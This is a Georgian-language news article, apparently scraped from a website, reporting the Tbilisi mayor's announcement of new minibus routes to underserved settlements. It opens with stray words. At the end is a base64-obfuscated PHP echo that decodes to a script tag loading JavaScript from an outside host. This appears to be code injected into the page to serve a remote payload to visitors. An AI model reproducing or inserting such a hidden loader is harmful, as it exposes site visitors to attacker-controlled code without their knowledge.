celsiusi
ავერსი შნაიდერი
ჩვენი დაპირება იყო, რომ არ დავტოვებდით დასახლებას, სადაც საზოგადოებრივი ტრანსპორტი არ იმოძრავებდა - მიმდინარეობს მარშრუტების გადალაგება ისე, რომ ყველასთვის ხელმისაწვდომი და კომფორტული იყოს საზოგადოებრივი ტრანსპორტი, - ამის შესახებ თბილისის მერმა, კახა კალაძემ დედაქალაქის მთავრობის სხდომაზე განაცხადა.
 
მისივე თქმით, სატრანსპორტო პოლიტიკა დიდ სარგებელს მოუტანს ყველა იმ ადამიანს, ვინც საზოგადოებრივი ტრანსპორტით სარგებლობს.
 
"მინდა შევეხო სატრანსპორტო პოლიტიკას. თქვენ იცით, რომ ჩვენი რეფორმის ერთ-ერთი მთავარი შემადგენელი იყო ის, რომ საზოგადოებრივი ტრანსპორტი ყველასთვის ხელმისაწვდომი ყოფილიყო. სამწუხაროდ, გვქონდა ისეთი ადგილები, სადაც საზოგადოებრივი ტრანსპორტი არ დადიოდა და ადგილობრივი მოსახლეობისთვის პრობლემებს წარმოადგენდა. ჩვენი დაპირება იყო, რომ ამ რეფორმის ფარგლებში არ დავტოვებდით არცერთ დასახლებას, სადაც საზოგადოებრივი ტრანსპორტი არ იმოძრავებს.
 
მინდა გაცნობით, რომ 1-ელი თებერვლიდან ახალი მიკროავტობუსები დაინიშნა "ავშიანის" დასახლებაში, გლდანის მეოთხე და მერვე მიკრორაიონის უკან მდებარე დასახლებებში, დიდი და პატარა ტბის მიმდებარე დასახლებაში, ასევე ინგუშეთის ქუჩაზე, ამავე რაიონში წყაროთუბნის დასახლებაში, ვეძისის და ზემო ვეძისის ისეთ ქუჩებზე, სადაც დღემდე არ დადიოდა ტრანსპორტი. რა თქმა უნდა, ამ პროგრამას ვაგრძელებთ.
 
ასევე ტრანსპორტით ისარგებლებს ბეთანიის მოსახლეობა, ელგუჯა ამაშუკელის ქუჩის, ავჭალის აგარაკების მცხოვრებლები. რა თქმა უნდა, ჩვენ ამ რეფორმას ვაგრძელებთ, მიმდინარეობს მარშრუტების გადალაგება, ისე, რომ ყველასთვის ხელმისაწვდომი და კომფორტული იყოს საზოგადოებრივი ტრანსპორტი. ეს პროცესი გრძელდება და დარწმუნებული ვარ, რომ რეფორმა, რომელიც 2017 წელს წამოვიწყეთ ძალიან დიდ სარგებელს მოუტანს ყველა იმ ადამიანს, ვინც საზოგადოებრივი ტრანსპორტით სარგებლობს“,- აღნიშნავს კალაძე.
902
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");